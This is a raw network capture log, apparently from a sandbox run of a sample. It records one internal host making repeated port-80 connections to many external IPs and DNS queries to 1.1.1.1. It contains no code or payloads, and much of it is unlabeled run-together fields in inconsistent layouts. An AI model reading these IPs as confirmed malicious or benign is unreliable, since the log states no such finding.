                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.479659081 CET5001180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.479702950 CET5001180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.484597921 CET805001147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.484608889 CET805001147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:25.945547104 CET805001147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:25.945635080 CET805001147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:25.945719957 CET5001180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.059743881 CET5001180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.064765930 CET805001147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.488183022 CET5001280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.493200064 CET805001213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.493261099 CET5001280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.493447065 CET5001280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.493489027 CET5001280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.499020100 CET805001213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.499031067 CET805001213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.946568966 CET805001213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.946675062 CET805001213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.946729898 CET5001280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.983886003 CET5001280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.990751028 CET805001213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.007531881 CET5001380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.014996052 CET805001344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.015074015 CET5001380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.015208960 CET5001380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.015237093 CET5001380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.020025015 CET805001344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.022183895 CET805001344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.502311945 CET805001344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.502351999 CET805001344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.502401114 CET5001380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.531588078 CET5001380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.536629915 CET805001344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.262088060 CET5001480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.270056963 CET805001418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.270379066 CET5001480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.286969900 CET5001480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.286969900 CET5001480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.299009085 CET805001418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.299021959 CET805001418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.666176081 CET805001418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.666189909 CET805001418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.666241884 CET5001480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.671145916 CET5001480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.675964117 CET805001418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.824798107 CET5001580192.168.2.5172.234.222.143
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 10:26:30.832252979 CET  80           50015      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:30.832333088 CET  50015        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:30.832493067 CET  50015        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:30.832518101 CET  50015        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:30.837364912 CET  80           50015      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:30.837471962 CET  80           50015      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:31.326311111 CET  80           50015      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:31.326387882 CET  50015        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.327971935 CET  50015        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.332936049 CET  80           50015      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:31.349349976 CET  50016        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.354356050 CET  80           50016      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:31.354429960 CET  50016        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.354562998 CET  50016        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.354581118 CET  50016        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.359586000 CET  80           50016      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:31.359599113 CET  80           50016      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:31.843375921 CET  80           50016      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:31.843449116 CET  50016        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.855971098 CET  50016        80         192.168.2.5      172.234.222.143
Nov 20, 2024 10:26:31.860901117 CET  80           50016      172.234.222.143  192.168.2.5
Nov 20, 2024 10:26:32.130625963 CET  50017        80         192.168.2.5      34.246.200.160
Nov 20, 2024 10:26:32.137929916 CET  80           50017      34.246.200.160   192.168.2.5
Nov 20, 2024 10:26:32.138040066 CET  50017        80         192.168.2.5      34.246.200.160
Nov 20, 2024 10:26:32.153145075 CET  50017        80         192.168.2.5      34.246.200.160
Nov 20, 2024 10:26:32.153245926 CET  50017        80         192.168.2.5      34.246.200.160
Nov 20, 2024 10:26:32.158217907 CET  80           50017      34.246.200.160   192.168.2.5
Nov 20, 2024 10:26:32.158235073 CET  80           50017      34.246.200.160   192.168.2.5
Nov 20, 2024 10:26:32.896600008 CET  80           50017      34.246.200.160   192.168.2.5
Nov 20, 2024 10:26:32.896646023 CET  80           50017      34.246.200.160   192.168.2.5
Nov 20, 2024 10:26:32.896714926 CET  50017        80         192.168.2.5      34.246.200.160
Nov 20, 2024 10:26:32.919681072 CET  50017        80         192.168.2.5      34.246.200.160
Nov 20, 2024 10:26:32.924763918 CET  80           50017      34.246.200.160   192.168.2.5
Nov 20, 2024 10:26:33.077440977 CET  50018        80         192.168.2.5      18.208.156.248
Nov 20, 2024 10:26:33.082503080 CET  80           50018      18.208.156.248   192.168.2.5
Nov 20, 2024 10:26:33.082617044 CET  50018        80         192.168.2.5      18.208.156.248
Nov 20, 2024 10:26:33.089867115 CET  50018        80         192.168.2.5      18.208.156.248
Nov 20, 2024 10:26:33.089900970 CET  50018        80         192.168.2.5      18.208.156.248
Nov 20, 2024 10:26:33.094975948 CET  80           50018      18.208.156.248   192.168.2.5
Nov 20, 2024 10:26:33.095046997 CET  80           50018      18.208.156.248   192.168.2.5
Nov 20, 2024 10:26:33.588474035 CET  80           50018      18.208.156.248   192.168.2.5
Nov 20, 2024 10:26:33.588494062 CET  80           50018      18.208.156.248   192.168.2.5
Nov 20, 2024 10:26:33.588562012 CET  50018        80         192.168.2.5      18.208.156.248
Nov 20, 2024 10:26:33.597635031 CET  50018        80         192.168.2.5      18.208.156.248
Nov 20, 2024 10:26:33.604161978 CET  80           50018      18.208.156.248   192.168.2.5
Nov 20, 2024 10:26:33.720232010 CET  50019        80         192.168.2.5      208.100.26.245
Nov 20, 2024 10:26:33.725235939 CET  80           50019      208.100.26.245   192.168.2.5
Nov 20, 2024 10:26:33.725301027 CET  50019        80         192.168.2.5      208.100.26.245
Nov 20, 2024 10:26:33.725439072 CET  50019        80         192.168.2.5      208.100.26.245
Nov 20, 2024 10:26:33.725466013 CET  50019        80         192.168.2.5      208.100.26.245
Nov 20, 2024 10:26:33.731590986 CET  80           50019      208.100.26.245   192.168.2.5
Nov 20, 2024 10:26:33.731959105 CET  80           50019      208.100.26.245   192.168.2.5
Nov 20, 2024 10:26:34.231839895 CET  80           50019      208.100.26.245   192.168.2.5
Nov 20, 2024 10:26:34.293111086 CET  50019        80         192.168.2.5      208.100.26.245
Nov 20, 2024 10:26:34.293147087 CET  50019        80         192.168.2.5      208.100.26.245
Nov 20, 2024 10:26:34.299083948 CET  80           50019      208.100.26.245   192.168.2.5
Nov 20, 2024 10:26:34.299103975 CET  80           50019      208.100.26.245   192.168.2.5
Nov 20, 2024 10:26:34.408735037 CET  80           50019      208.100.26.245   192.168.2.5
Nov 20, 2024 10:26:34.527256012 CET  50019        80         192.168.2.5      208.100.26.245
Nov 20, 2024 10:26:34.538752079 CET  50020        80         192.168.2.5      13.251.16.150
Nov 20, 2024 10:26:34.545201063 CET  80           50020      13.251.16.150    192.168.2.5
Nov 20, 2024 10:26:34.545294046 CET  50020        80         192.168.2.5      13.251.16.150
Nov 20, 2024 10:26:34.559005976 CET  50020        80         192.168.2.5      13.251.16.150
Nov 20, 2024 10:26:34.559046030 CET  50020        80         192.168.2.5      13.251.16.150
Nov 20, 2024 10:26:34.563930988 CET  80           50020      13.251.16.150    192.168.2.5
Nov 20, 2024 10:26:34.563946009 CET  80           50020      13.251.16.150    192.168.2.5
Nov 20, 2024 10:26:35.982280970 CET  80           50020      13.251.16.150    192.168.2.5
Nov 20, 2024 10:26:35.983604908 CET  80           50020      13.251.16.150    192.168.2.5
Nov 20, 2024 10:26:35.983670950 CET  50020        80         192.168.2.5      13.251.16.150
Nov 20, 2024 10:26:36.005100012 CET  50020        80         192.168.2.5      13.251.16.150
Nov 20, 2024 10:26:36.015830040 CET  80           50020      13.251.16.150    192.168.2.5
Nov 20, 2024 10:26:36.282284975 CET  50021        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:26:36.287858009 CET  80           50021      44.221.84.105    192.168.2.5
Nov 20, 2024 10:26:36.287965059 CET  50021        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:26:36.293088913 CET  50021        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:26:36.293121099 CET  50021        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:26:36.298069954 CET  80           50021      44.221.84.105    192.168.2.5
Nov 20, 2024 10:26:36.298109055 CET  80           50021      44.221.84.105    192.168.2.5
Nov 20, 2024 10:26:36.747081041 CET  80           50021      44.221.84.105    192.168.2.5
Nov 20, 2024 10:26:36.747227907 CET  80           50021      44.221.84.105    192.168.2.5
Nov 20, 2024 10:26:36.747277021 CET  50021        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:26:36.761112928 CET  50021        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:26:36.766057014 CET  80           50021      44.221.84.105    192.168.2.5
Nov 20, 2024 10:26:36.902735949 CET  50022        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:26:36.909703016 CET  80           50022      54.244.188.177   192.168.2.5
Nov 20, 2024 10:26:36.909842968 CET  50022        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:26:36.918621063 CET  50022        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:26:36.918658018 CET  50022        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:26:36.925362110 CET  80           50022      54.244.188.177   192.168.2.5
Nov 20, 2024 10:26:36.925400019 CET  80           50022      54.244.188.177   192.168.2.5
Nov 20, 2024 10:26:37.644460917 CET  80           50022      54.244.188.177   192.168.2.5
Nov 20, 2024 10:26:37.644901991 CET  80           50022      54.244.188.177   192.168.2.5
Nov 20, 2024 10:26:37.644959927 CET  50022        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:26:37.662206888 CET  50022        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:26:37.670361996 CET  80           50022      54.244.188.177   192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.879352093 CET5002380192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.902380943 CET805002335.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.902484894 CET5002380192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.915445089 CET5002380192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.915488958 CET5002380192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.941188097 CET805002335.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.941453934 CET805002335.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.778750896 CET805002335.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.778774023 CET805002335.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.778814077 CET5002380192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.787028074 CET5002380192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.794559002 CET805002335.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.961921930 CET5002480192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.969877958 CET80500243.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.970022917 CET5002480192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.011897087 CET5002480192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.011897087 CET5002480192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.024843931 CET80500243.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.024856091 CET80500243.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.477114916 CET80500243.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.477134943 CET80500243.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.477226973 CET5002480192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.487242937 CET5002480192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.503479004 CET80500243.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.600828886 CET5002580192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.606069088 CET8050025165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.606151104 CET5002580192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.606312037 CET5002580192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.606337070 CET5002580192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.613034964 CET8050025165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.613045931 CET8050025165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.369534016 CET8050025165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.429440022 CET5002580192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.429999113 CET5002680192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.436394930 CET8050025165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.436441898 CET5002580192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.436450005 CET8050026165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.436505079 CET5002680192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.439343929 CET5002680192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.439369917 CET5002680192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.450576067 CET8050026165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.450658083 CET8050026165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.159498930 CET8050026165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.324078083 CET5002680192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.371330976 CET5002780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.380877018 CET805002754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.382302046 CET5002780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.390053988 CET5002780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.391333103 CET5002780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.398597956 CET805002754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.400265932 CET805002754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.135647058 CET805002754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.138478041 CET805002754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.141765118 CET5002780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.183911085 CET5002780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.192051888 CET805002754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.447189093 CET5001980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.447525024 CET5002880192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.457736969 CET8050028208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.458384037 CET8050019208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.458470106 CET5001980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.458489895 CET5002880192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.475188971 CET5002880192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.475212097 CET5002880192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.490848064 CET8050028208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.493436098 CET8050028208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.985582113 CET8050028208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.050230980 CET5002880192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.050250053 CET5002880192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.056195974 CET8050028208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.056207895 CET8050028208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123352051 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123450994 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.128504038 CET805003813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.035049915 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.044502974 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.044605017 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057140112 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057321072 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.065728903 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.065746069 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519124985 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519175053 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519223928 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519310951 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.527396917 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.538759947 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544015884 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544109106 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544234037 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544248104 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.549474001 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.549515009 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.959669113 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.959695101 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.959781885 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.965012074 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.969974041 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.972806931 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.978118896 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.978202105 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.979625940 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.979665995 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.984555006 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.984652996 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.453226089 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.453301907 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.453392029 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.471127033 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.479581118 CET80500433.94.10.34192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.378278017 CET5194153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.385643005 CET53519411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.707298994 CET6293453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.716018915 CET53629341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.514301062 CET5115653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.521717072 CET53511561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.870697975 CET6199853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.878885984 CET53619981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.879440069 CET6092853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.886940002 CET53609281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.374777079 CET5059853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.384037971 CET53505981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.384620905 CET5499953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.394486904 CET53549991.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.398205996 CET5432453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.408608913 CET53543241.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:40.837394953 CET5849653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:40.844724894 CET53584961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.304610968 CET5724753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.315839052 CET53572471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.060353994 CET4992053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.067043066 CET53499201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.984584093 CET6500453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.994062901 CET53650041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.532308102 CET6538253192.168.2.51.1.1.1
